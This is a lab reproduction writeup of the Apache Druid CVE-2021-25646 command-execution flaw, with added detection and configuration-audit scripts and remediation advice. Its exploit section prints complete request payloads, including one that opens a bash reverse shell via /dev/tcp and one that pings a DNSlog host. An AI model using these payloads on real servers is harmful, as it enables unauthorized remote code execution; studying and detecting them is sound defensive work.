Reproducing the Apache Druid unauthenticated command execution vulnerability (CVE-2021-25646)
1. Introduction
Apache Druid is an open-source, column-oriented distributed data store written in Java. It is designed to ingest large volumes of event data quickly and to serve low-latency queries on top of that data.
2. Vulnerability overview
- ID: CVE-2021-25646 (critical)
By default Apache Druid ships without authentication or authorization. An attacker can send a specially crafted request and execute arbitrary code with the privileges of the Druid server process.
3. Affected versions
- Apache Druid < 0.20.1
4. Environment setup
Ubuntu
1. Install Docker
apt install docker.io
2. Start the vulnerable environment
docker run -d -p 8081:8888 fokkodriesprong/docker-druid
5. Reproduction
- My IP is: 121.36.200.207
- Open: http://121.36.200.207:8081
Click Load data
Click Local disk
On the right-hand side:
Base directory: quickstart/tutorial/
File filter: wikiticker-2015-09-12-sampled.json.gz
Click Preview and capture the request with Burp.
DNSlog
First obtain a DNSlog address.
Replace the request body with the following, substituting your own address for yt1biq.dnslog.cn:
{
  "type": "index",
  "spec": {
    "type": "index",
    "ioConfig": {
      "type": "index",
      "firehose": {
        "type": "local",
        "baseDir": "quickstart/tutorial/",
        "filter": "wikiticker-2015-09-12-sampled.json.gz"
      }
    },
    "dataSchema": {
      "dataSource": "sample",
      "parser": {
        "type": "string",
        "parseSpec": {
          "format": "json",
          "timestampSpec": {"column": "time", "format": "iso"},
          "dimensionsSpec": {}
        }
      },
      "transformSpec": {
        "transforms": [],
        "filter": {
          "type": "javascript",
          "function": "function(value){return java.lang.Runtime.getRuntime().exec('ping yt1biq.dnslog.cn')}",
          "dimension": "added",
          "": {"enabled": "true"}
        }
      }
    }
  },
  "samplerConfig": {"numRows": 500, "timeoutMs": 15000, "cacheKey": "4ddb48fdbad7406084e37a1b80100214"}
}
Reverse shell
Replace the request body with the following, changing the listener IP and port to your own:
{
  "type": "index",
  "spec": {
    "type": "index",
    "ioConfig": {
      "type": "index",
      "firehose": {
        "type": "local",
        "baseDir": "quickstart/tutorial/",
        "filter": "wikiticker-2015-09-12-sampled.json.gz"
      }
    },
    "dataSchema": {
      "dataSource": "sample",
      "parser": {
        "type": "string",
        "parseSpec": {
          "format": "json",
          "timestampSpec": {"column": "time", "format": "iso"},
          "dimensionsSpec": {}
        }
      },
      "transformSpec": {
        "transforms": [],
        "filter": {
          "type": "javascript",
          "function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/121.36.200.207/1234 0>&1')}",
          "dimension": "added",
          "": {"enabled": "true"}
        }
      }
    }
  },
  "samplerConfig": {"numRows": 500, "timeoutMs": 15000, "cacheKey": "4ddb48fdbad7406084e37a1b80100214"}
}
The shell connects back successfully.
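Both request bodies above share one detectable shape: a transformSpec filter of type "javascript" whose function reaches into java.lang.Runtime, plus an empty-name key ("") carrying an enabled=true object that overrides the server's JavaScript configuration for that single request. The Preview button sends this body to the console's sampler API, so a reverse proxy or WAF in front of Druid (or a log review afterwards) can flag it. The following detector is an added example written for this page, not code from the writeup or from the Druid project; the two request bodies it parses are constructed here to mirror the payload shape, with a harmless stub in place of the exec call.

```python
import json

# Tokens in the JavaScript body that indicate it is reaching out of the script
# into the JVM rather than filtering rows. Assumed list for this example.
RUNTIME_TOKENS = ("java.lang.Runtime", "getRuntime", "ProcessBuilder", "java.lang.reflect")


def make_body(filter_spec):
    """Build a constructed sampler request body around the given transformSpec filter.

    The surrounding spec mirrors the writeup's request; only the filter varies.
    """
    return json.dumps({
        "type": "index",
        "spec": {
            "type": "index",
            "ioConfig": {"type": "index", "firehose": {
                "type": "local",
                "baseDir": "quickstart/tutorial/",
                "filter": "wikiticker-2015-09-12-sampled.json.gz"}},
            "dataSchema": {
                "dataSource": "sample",
                "parser": {"type": "string", "parseSpec": {
                    "format": "json",
                    "timestampSpec": {"column": "time", "format": "iso"},
                    "dimensionsSpec": {}}},
                "transformSpec": {"transforms": [], "filter": filter_spec},
            },
        },
        "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
    })


# Constructed samples (not captured from a real cluster): the first has the
# exploit shape with a stub function, the second is an ordinary selector filter.
MALICIOUS_BODY = make_body({
    "type": "javascript",
    "function": "function(value){return java.lang.Runtime.getRuntime()}",
    "dimension": "added",
    "": {"enabled": "true"},
})
BENIGN_BODY = make_body({"type": "selector", "dimension": "added", "value": "1"})


def find_javascript_nodes(node, path="$"):
    """Walk the whole spec and return every object whose type is 'javascript'.

    JavaScript can appear in filters, transforms, aggregators and extraction
    functions, so the walk is generic rather than tied to transformSpec.filter.
    """
    findings = []
    if isinstance(node, dict):
        if node.get("type") == "javascript":
            function = str(node.get("function", ""))
            override = node.get("")
            findings.append({
                "path": path,
                "function": function,
                # the empty-name key is the per-request config override
                "config_override": isinstance(override, dict) and "enabled" in override,
                "runtime_call": any(tok in function for tok in RUNTIME_TOKENS),
            })
        for key, value in node.items():
            findings.extend(find_javascript_nodes(value, f"{path}.{key or '<empty>'}"))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            findings.extend(find_javascript_nodes(value, f"{path}[{index}]"))
    return findings


def inspect_request(body):
    """Classify one request body as clean, javascript, exploit-shape or unparseable."""
    try:
        doc = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return {"verdict": "unparseable", "findings": []}
    findings = find_javascript_nodes(doc)
    if not findings:
        verdict = "clean"
    elif any(f["config_override"] or f["runtime_call"] for f in findings):
        verdict = "exploit-shape"   # config override or JVM access: treat as an attack
    else:
        verdict = "javascript"      # JavaScript present; only legitimate in high-trust setups
    return {"verdict": verdict, "findings": findings}


if __name__ == "__main__":
    for name, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        result = inspect_request(body)
        print(name, result["verdict"], [f["path"] for f in result["findings"]])
```

The walk is deliberately generic: the same check applies to ingestion task submissions and native queries, where JavaScript-typed objects are equally unexpected on a cluster that has JavaScript disabled. Run `inspect_request` over captured bodies and alert on anything other than "clean".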
6. Remediation
- Upgrade Apache Druid to the latest version
- Apply access control to Apache Druid so that only trusted hosts can reach the cluster servers
Update Apache Druid promptly; download links:
- https://druid.apache.org/downloads.html
- https://github.com/apache/druid/releases/tag/druid-0.20.1
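The two remediation points translate into concrete settings: run a fixed version (0.20.1 or later, where the per-request override no longer bypasses server configuration), keep `druid.javascript.enabled=false`, and configure an authenticator and authorizer so that anonymous clients cannot reach the ingestion and sampler APIs. The audit script below is an added example written for this page, not code from the writeup or the Druid project. The two runtime.properties excerpts are constructed for the example; the hardened one follows the shape of Druid's basic-security extension configuration, and `<REPLACE-ME>` marks values you must set yourself.

```python
import re

# Constructed excerpts of runtime.properties (not from a real deployment).
WEAK_PROPERTIES = """
# JavaScript switched on cluster-wide, no authenticator, no authorizer
druid.javascript.enabled=true
"""

HARDENED_PROPERTIES = """
druid.extensions.loadList=["druid-basic-security"]
druid.javascript.enabled=false
druid.auth.authenticatorChain=["MyBasicMetadataAuthenticator"]
druid.auth.authenticator.MyBasicMetadataAuthenticator.type=basic
druid.auth.authenticator.MyBasicMetadataAuthenticator.initialAdminPassword=<REPLACE-ME>
druid.auth.authenticator.MyBasicMetadataAuthenticator.initialInternalClientPassword=<REPLACE-ME>
druid.auth.authenticator.MyBasicMetadataAuthenticator.credentialsValidator.type=metadata
druid.auth.authenticator.MyBasicMetadataAuthenticator.skipOnFailure=false
druid.auth.authenticator.MyBasicMetadataAuthenticator.authorizerName=MyBasicMetadataAuthorizer
druid.escalator.type=basic
druid.escalator.internalClientUsername=druid_system
druid.escalator.internalClientPassword=<REPLACE-ME>
druid.escalator.authorizerName=MyBasicMetadataAuthorizer
druid.auth.authorizers=["MyBasicMetadataAuthorizer"]
druid.auth.authorizer.MyBasicMetadataAuthorizer.type=basic
"""

# First release in which the per-request JavaScript override no longer works.
FIXED_VERSION = (0, 20, 1)

# Values that mean "no real authentication/authorization configured".
UNSET_VALUES = ("", "[]", '["allowAll"]')


def parse_properties(text):
    """Minimal parser for Java-style key=value properties; comments and blanks are skipped."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def parse_version(version):
    """'0.20.1' -> (0, 20, 1); only the leading numeric components are compared."""
    return tuple(int(p) for p in re.findall(r"\d+", version)[:3])


def audit(props_text, version):
    """Return a list of findings; an empty list means the checked settings look right."""
    props = parse_properties(props_text)
    findings = []
    if parse_version(version) < FIXED_VERSION:
        findings.append(f"Druid {version} is older than 0.20.1: JavaScript can be forced on per request")
    # Druid's default for this property is false, so a missing key is treated as false.
    if props.get("druid.javascript.enabled", "false").lower() == "true":
        findings.append("druid.javascript.enabled=true: user-supplied JavaScript allowed cluster-wide")
    if props.get("druid.auth.authenticatorChain", "") in UNSET_VALUES:
        findings.append("no authenticator chain: every client reaching the API is anonymous")
    if props.get("druid.auth.authorizers", "") in UNSET_VALUES:
        findings.append("no authorizer: no access control on the API")
    authenticator_types = [v for k, v in props.items()
                           if k.startswith("druid.auth.authenticator.") and k.endswith(".type")]
    if "basic" in authenticator_types and "druid-basic-security" not in props.get("druid.extensions.loadList", ""):
        findings.append("basic authenticator configured but druid-basic-security is not loaded")
    return findings


if __name__ == "__main__":
    for label, text, version in (("weak", WEAK_PROPERTIES, "0.20.0"),
                                 ("hardened", HARDENED_PROPERTIES, "0.20.1")):
        print(label, version, audit(text, version) or ["no findings"])
```

Network-level restriction (the second bullet above) is still worth keeping even with authentication on: the sampler and task endpoints are not something untrusted networks need to reach at all.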
Comments and discussion are welcome.